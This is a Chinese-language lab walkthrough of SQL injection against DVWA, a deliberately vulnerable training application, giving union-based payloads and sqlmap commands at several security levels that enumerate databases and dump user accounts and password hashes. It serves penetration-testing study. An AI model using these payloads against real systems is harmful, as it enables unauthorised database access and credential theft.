安全级别:low
使用手工注入
目标:http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
1' or '1' ='1
1' or 1 = 1 #
1' or 1 = 1 -- 这个--后面有个空格
上面只是测试SQL注入是否存在
手工SQL注入各种操作
爆出所有数据库
1' and 1=2 union select 1,schema_name from information_schema.schemata --
爆出所有的表名
1' and 1=2 union select table_schema,table_name from information_schema.tables --
爆数据库当前在使用的数据库名
1' and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata --
数据库用户信息和版本号
1' and 1=2 union select 1,concat(database(),0x3a,user(),0x3a,version()) from information_schema.schemata --
爆表
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --
爆字段
1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
and table_schema=database() --爆出全部内容
1' and 1=2 union select 1,group_concat(user_id,0x3a,user,0x3a,password) from users --
一个一个爆
1' and 1=2 union select 1,concat(user) from users limit 0,1 --
爆出账户和密码
1' and 1=2 union select concat(user),concat(password) from users limit 0,1 --
使用sqlmap注入
判断是否存在注入
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"
列出所有数据库
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --dbs
直接爆出账户和密码
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --users --passwords
注意这里因为DVWA是登录状态,所以注入的时候需要带上cookie,这里的cookie值是cookie属性不需要带上cookie的key和value
安全级别:medium
使用手工注入
这个中级别就是变成了POST请,只要使用Burpsuite或者OWASP ZAP 抓包提交POST的BODY体 数据即可
在body体中提交如下数据
id=1 union select 1, version() limit 1,1 &Submit=Submit
其他跟低级别的类似
爆出所有数据库
id=1 union select 1,schema_name from information_schema.schemata -- &Submit=Submit
爆出所有表名
id=1 union select table_schema,table_name from information_schema.tables -- &Submit=Submit
爆出当前在使用的数据库名
id=1 union select 1,group_concat(schema_name) from information_schema.schemata -- &Submit=Submit
爆出用户信息和版本号
id=1 union select 1,concat(database(),0x3a,user(),0x3a,version()) from information_schema.schemata -- &Submit=Submit
爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &Submit=Submit
爆字段
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database() -- &Submit=Submit
爆出全部内容
id=1 union select 1,group_concat(user_id,0x3a,user,0x3a,password) from users -- &Submit=Submit
一个一个爆
id=1 union select 1,concat(user) from users limit 0,1 &Submit=Submit
爆出账户和密码
id=1 union select concat(user),concat(password) from users limit 0,1 -- &Submit=Submit
使用sqlmap注入
测试是否存在注入
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/#" --data "id=2&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"
列出所有的数据库
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/#" --data "id=2&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --dbs
其他操作都一样
SQL盲注
安全级别:低
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"SQL盲注
安全级别:中
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/#" --data="id=3&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"SQL盲注
安全级别:高
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=5&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie="security=high; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" -p id --level=5 --risk=3免责申明:本人所撰写的文章,仅供学习和研究使用,请勿使用文中的技术或源码用于非法用途,任何人造成的任何负面影响,或触犯法律,与本人无关